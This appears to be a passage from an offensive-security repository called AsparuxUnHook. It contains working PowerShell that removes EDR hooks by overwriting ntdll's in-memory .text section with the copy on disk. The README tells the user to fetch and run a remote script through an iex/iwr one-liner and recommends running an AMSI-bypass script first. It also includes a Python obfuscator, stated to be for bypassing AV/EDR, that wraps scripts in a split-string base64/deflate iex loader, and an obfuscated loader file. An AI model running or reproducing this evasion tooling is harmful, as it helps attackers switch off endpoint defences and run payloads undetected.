= $True )] 402 | [String] 403 | $Module, 404 | 405 | [Parameter( Position = 1, Mandatory = $True )] 406 | [String] 407 | $Procedure 408 | ) 409 | 410 | $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | 411 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } 412 | $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') 413 | $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') 414 | $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress',[Type[]]@([System.Runtime.InteropServices.HandleRef], [String])) 415 | $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) 416 | $tmpPtr = New-Object IntPtr 417 | $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) 418 | Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) 419 | } 420 | 421 | #PEInfo must contain the following NoteProperties: 422 | # PEHandle: An IntPtr to the address the PE is loaded to in memory 423 | Function Get-PEDetailedInfo 424 | { 425 | Param( 426 | [Parameter( Position = 0, Mandatory = $true)] 427 | [IntPtr] 428 | $PEHandle, 429 | 430 | [Parameter(Position = 1, Mandatory = $true)] 431 | [System.Object] 432 | $Win32Types 433 | ) 434 | 435 | if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero) 436 | { 437 | throw 'PEHandle is null or IntPtr.Zero' 438 | } 439 | 440 | $PEInfo = New-Object System.Object 441 | 442 | $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types 443 | 444 | $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle 445 | $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS) 446 | $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr) 447 | $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value 
($NtHeadersInfo.PE64Bit) 448 | $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) 449 | 450 | if ($PEInfo.PE64Bit -eq $true) 451 | { 452 | [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64))) 453 | $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr 454 | } 455 | else 456 | { 457 | [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32))) 458 | $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr 459 | } 460 | 461 | return $PEInfo 462 | } 463 | 464 | Function Get-Win32Functions 465 | { 466 | 467 | # I will only need VirtualProtect for unhooking. 468 | $Win32Functions = New-Object System.Object 469 | 470 | $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect 471 | $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]) 472 | $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate) 473 | $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect 474 | 475 | return $Win32Functions 476 | } 477 | 478 | #Copy-Sections based function of PowerSploit (https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1#L1551) 479 | Function Unhooking 480 | { 481 | Param( 482 | [Parameter(Position = 0, Mandatory = $true)] 483 | [Byte[]] 484 | $PEBytes, 485 | 486 | [Parameter(Position = 1, Mandatory = $true)] 487 | [System.Object] 488 | $PEInfo, 489 | 490 | [Parameter(Position = 2, Mandatory = $true)] 491 | [System.Object] 492 
| $Win32Functions, 493 | 494 | [Parameter(Position = 3, Mandatory = $true)] 495 | [System.Object] 496 | $Win32Types 497 | ) 498 | 499 | # Iterate on the sections of the PE 500 | for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) 501 | { 502 | 503 | [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER))) 504 | $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER) 505 | 506 | #Verify if the iterated section is the .text section 507 | if (($SectionHeader.Name -join '') -eq ".text") { 508 | 509 | #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated 510 | # in memory for the section 511 | $offset = $SectionHeader.PointerToRawData 512 | Write-Verbose "[*] PointerToRawData .text: $($SectionHeader.PointerToRawData)" 513 | Write-Verbose "[*] SizeOfRawData .text: $($SectionHeader.SizeOfRawData)" 514 | Write-Verbose "[*] VirtualAddress .text: $($SectionHeader.VirtualAddress)" 515 | 516 | # Calculate the size of the .text section on disk 517 | $size = $SectionHeader.SizeOfRawData + $offset - 1 518 | 519 | # Index from the previously read ntdll bytes only what we need (.text section) 520 | $newBytes = $PEBytes[$offset..$size] 521 | 522 | # We add the base address (BaseAddres) of ntdl and the virtual address of ntdll 523 | # to obtain the offset of our .text section in memory. 
524 | [IntPtr]$offsetVirtual = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionHeader.VirtualAddress) ([Int64]$PEInfo.PEHandle)) 525 | Write-Verbose "[*] Virtual .text offset: $offsetVirtual" 526 | 527 | $PAGE_EXECUTE_READWRITE = 0x40 528 | 529 | [UInt32]$OldProtectFlag = 0 530 | # We modify the permissions of our .text section to be able to overwrite in it 531 | $Success = $Win32Functions.VirtualProtect.Invoke($offsetVirtual, $newBytes.Length, $PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) 532 | if ($Success -eq $false) 533 | { 534 | Throw "[!] Unable to change memory protection" 535 | } 536 | 537 | Write-Verbose "[*] Writing clean bytes to our .text section of ntdll.dll" 538 | 539 | # We write our clean bytes over our ntdll 540 | Write-BytesToMemory -Bytes $newBytes -MemoryAddress $offsetVirtual 541 | return 542 | } 543 | 544 | } 545 | } 546 | 547 | # Function based on Write-BytesToMemory from PowerSploit 548 | Function Read-BytesToMemory 549 | { 550 | Param( 551 | [Parameter(Position=0, Mandatory = $true)] 552 | [Int] 553 | $Length, 554 | 555 | [Parameter(Position=1, Mandatory = $true)] 556 | [IntPtr] 557 | $MemoryAddress 558 | ) 559 | 560 | for ($Offset = 0; $Offset -lt $Length; $Offset++) 561 | { 562 | [System.Runtime.InteropServices.Marshal]::ReadByte([IntPtr]::Add($MemoryAddress, $Offset)) 563 | } 564 | } 565 | 566 | Function Main() 567 | { 568 | 569 | $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) 570 | if ($PtrSize -eq 4) { 571 | Throw "[!] 
AsparuxUnHook only works for 64 bits" 572 | } 573 | 574 | Write-Verbose "PowerShell ProcessID: $PID" 575 | 576 | # We try to check for hooks 577 | $HookCheck = [Byte[]](0x4c, 0x8b, 0xd1, 0xb8) 578 | $NtAllocateVirtualMemory = Get-ProcAddress ntdll.dll NtAllocateVirtualMemory 579 | 580 | [Byte[]] $BytesFunc = Read-BytesToMemory 4 $NtAllocateVirtualMemory 581 | $hexBytes = ($BytesFunc | ForEach-Object { "0x{0:X2}" -f $_ }) -join ', ' 582 | if (![System.Linq.Enumerable]::SequenceEqual($HookCheck, $BytesFunc)) { 583 | Write-Host "[*] Hooked function found: $hexBytes" -ForegroundColor Cyan 584 | } else { 585 | Write-Host "[*] Hooked function not found: $hexBytes" -ForegroundColor Red 586 | return 587 | } 588 | 589 | # We read clean ntdll from disk 590 | [Byte[]] $PEBytes = Get-Content -Encoding byte -Raw -Path "C:\Windows\System32\ntdll.dll" 591 | Write-Verbose "[*] Reading ntdll.dll from disk" 592 | 593 | # Simple way to obtain the base address of a dll without PEB Walking 594 | $Proc = Get-Process -Id $Pid 595 | $ntdll = ($Proc.Modules | Where-Object {$_.ModuleName -eq 'ntdll.dll'}).BaseAddress 596 | Write-Verbose "[*] The base address of ntdll.dll is: $ntdll" 597 | 598 | $Types = Get-Win32Types 599 | $Win32Functions = Get-Win32Functions 600 | 601 | Write-Verbose "[*] Getting detailed PE information from the headers loaded in memory" 602 | $PEInfo = Get-PEDetailedInfo -PEHandle $ntdll -Win32Types $Types 603 | 604 | Unhooking -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Types 605 | 606 | # We check if hooks are still present. 
607 | [Byte[]] $BytesFunc = Read-BytesToMemory 4 $NtAllocateVirtualMemory 608 | $hexBytes = ($BytesFunc | ForEach-Object { "0x{0:X2}" -f $_ }) -join ', ' 609 | if ([System.Linq.Enumerable]::SequenceEqual($HookCheck, $BytesFunc)) { 610 | Write-Host "[*] Successful unhooking: $hexBytes" -ForegroundColor Green 611 | } else { 612 | Write-Host "[*] Unsuccessful unhooking: $hexBytes" -ForegroundColor Red 613 | } 614 | 615 | 616 | } 617 | 618 | Main 619 | } 620 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AsparuxUnHook 2 | 3 | AsparuxUnHook is an advanced tool written in PowerShell that uses Reflection to access the Windows API and low-level functions. This tool focuses on cleaning the hooks present in the ntdll.dll module from memory, restoring its original state by reading ntdll.dll directly from disk. 4 | 5 | FUNCTION HOOKED --> 6 | 7 | ![imatge](https://github.com/user-attachments/assets/bf8551e6-c9ae-479f-89fd-51a59a447175) 8 | 9 | 10 | FUNCTION UNHOOKED (Clean function after running AsparuxUnHook) --> 11 | 12 | ![imatge](https://github.com/user-attachments/assets/77e4e26b-fd9d-4fed-8380-9934aed1a719) 13 | 14 | 15 | # Instructions 16 | 17 | ``` 18 | iex (iwr -UseBasicParsing https://raw.githubusercontent.com/ASP4RUX/ReflectionUnHook/refs/heads/main/ofuscateasparuxunhook.ps1) 19 | ``` 20 | 21 | ``` 22 | Invoke-AsparuxUnHook 23 | ``` 24 | 25 | ``` 26 | Invoke-AsparuxUnHook -v 27 | ``` 28 | 29 | # Recommendation 30 | 31 | I recommend running the Invoke-ASAMSI script from my GitHub first, followed by AsparuxUnHook. 32 | -------------------------------------------------------------------------------- /asamsiobfuscate.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import sys 5 | import locale 6 | import os 7 | import zlib 8 | import base64 9 | 
import ctypes 10 | import atexit 11 | 12 | # ANSI Colors 13 | FAIL = "\033[91m" 14 | OKGREEN = "\033[92m" 15 | ENDC = "\033[0m" 16 | HEADER = "\033[95m" 17 | 18 | # Function for colors in Windows 19 | def init(): 20 | def restore_console(): 21 | # Restore the original console mode 22 | print(ENDC, end="") 23 | stdout = ctypes.windll.kernel32.GetStdHandle(-11) 24 | ctypes.windll.kernel32.SetConsoleMode(stdout, original_mode) 25 | 26 | if os.name == 'nt': 27 | # Get the handle of the standard output 28 | stdout = ctypes.windll.kernel32.GetStdHandle(-11) # -11 representa STD_OUTPUT_HANDLE 29 | 30 | # Save the original console mode 31 | global original_mode 32 | original_mode = ctypes.c_uint32() 33 | 34 | ctypes.windll.kernel32.GetConsoleMode(stdout, ctypes.byref(original_mode)) 35 | 36 | # Enable special character processing 37 | new_mode = original_mode.value | 0x0004 38 | ctypes.windll.kernel32.SetConsoleMode(stdout, new_mode) 39 | atexit.register(restore_console) 40 | 41 | init() 42 | 43 | # Detect the system language 44 | lang, _ = locale.getlocale() 45 | 46 | # Configure messages according to language 47 | if lang.startswith("es"): # Spanish 48 | description = "Ofusca archvios .ps1 para evadir controles de AV/EDR por HTTP." 49 | epilog = "Ejemplo: python NullObfuscate.py -f archivo.ps1 -o salida.ps1" 50 | help_file = "Archivo .ps1 a ofuscar" 51 | help_out = "Nombre del archivo de salida" 52 | else: # English (default) 53 | description = "Obfuscate .ps1 files to bypass AV/EDR controls over HTTP." 
54 | epilog = "Example: python NullObfuscate.py -f file.ps1 -o out.ps1" 55 | help_file = ".ps1 file to obfuscate" 56 | help_out = "Output file name" 57 | 58 | # Configure parser 59 | parser = argparse.ArgumentParser( 60 | description=description, 61 | epilog=epilog, 62 | formatter_class=argparse.ArgumentDefaultsHelpFormatter 63 | ) 64 | 65 | # Adding arguments 66 | parser.add_argument("-f", "--file", type=str, help=help_file) 67 | parser.add_argument("-o", "--output", type=str, default="out.ps1", help=help_out) 68 | 69 | # Show help if there are no arguments 70 | if len(sys.argv) == 1: 71 | parser.print_help() 72 | sys.exit(1) 73 | 74 | # Parse arguments 75 | args = parser.parse_args() 76 | 77 | # Check if the file exists 78 | if os.path.exists(args.file): 79 | try: 80 | # Open the file as read 81 | with open(args.file, 'r') as f: 82 | strr = f.read() 83 | string_val = strr.encode() 84 | 85 | # We compress the content 86 | zlibbed_str = zlib.compress(string_val) 87 | compressed_string = zlibbed_str[2:-4] 88 | 89 | # Format and use base64 to use it in PowerShell 90 | powershell_command = """$c ="Defla" + "teStream";$b = "Compre" + "ssion"; $a ="Strea" + "mReader"; .("i"+"ex") $(New-Object IO.$a ($(New-Object IO.$b.$c ($(New-Object IO.MemoryStream(,$([Convert]::("FromB" +"ase6" + "4String")("{}")))), [IO.Compression.CompressionMode]::("De" +"compress"))), [Text.Encoding]::ASCII)).ReadToEnd();""" 91 | powershell_command = powershell_command.format(base64.b64encode(compressed_string).decode('ascii')) 92 | 93 | except Exception as err: 94 | # Error messages by language 95 | if lang.startswith("es"): 96 | print(f"{FAIL}[!] Error: Al abrir el archivo '{args.file}': {err}") 97 | else: 98 | print(f"{FAIL}[!] 
Error: When opening the file '{args.file}': {err}") 99 | sys.exit(1) 100 | 101 | try: 102 | # We write the output to a file 103 | with open(args.output, 'w') as file: 104 | file.write(powershell_command) 105 | if lang.startswith("es"): 106 | print(f"{OKGREEN}[+] Archivo {args.file} ofuscado correctamente!") 107 | print(f"{HEADER}[i] Guardado como: {args.output}") 108 | else: 109 | print(f"{OKGREEN}[+] File {args.file} obfuscated successfully!") 110 | print(f"{HEADER}[i] Saved as: {args.output}") 111 | 112 | except Exception as err: 113 | # More errors 114 | if lang.startswith("es"): 115 | print(f"{FAIL}[!] Error: Al abrir el archivo '{args.output}': {err}") 116 | else: 117 | print(f"{FAIL}[!] Error: When opening the file '{args.output}': {err}") 118 | 119 | else: 120 | # More errors if file dont exist 121 | if lang.startswith("es"): 122 | print(f"{FAIL}[!] El archivo '{args.file}' no existe.") 123 | else: 124 | print(f"{FAIL}[!] The file '{args.file}' does not exist.") 125 | -------------------------------------------------------------------------------- /ofuscateasparuxunhook.ps1: -------------------------------------------------------------------------------- 1 | $c ="Defla" + "teStream";$b = "Compre" + "ssion"; $a ="Strea" + "mReader"; .("i"+"ex") $(New-Object IO.$a ($(New-Object IO.$b.$c ($(New-Object IO.MemoryStream(,$([Convert]::("FromB" +"ase6" + "4String")("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")))), [IO.Compression.CompressionMode]::("De" +"compress"))), [Text.Encoding]::ASCII)).ReadToEnd(); 2 | --------------------------------------------------------------------------------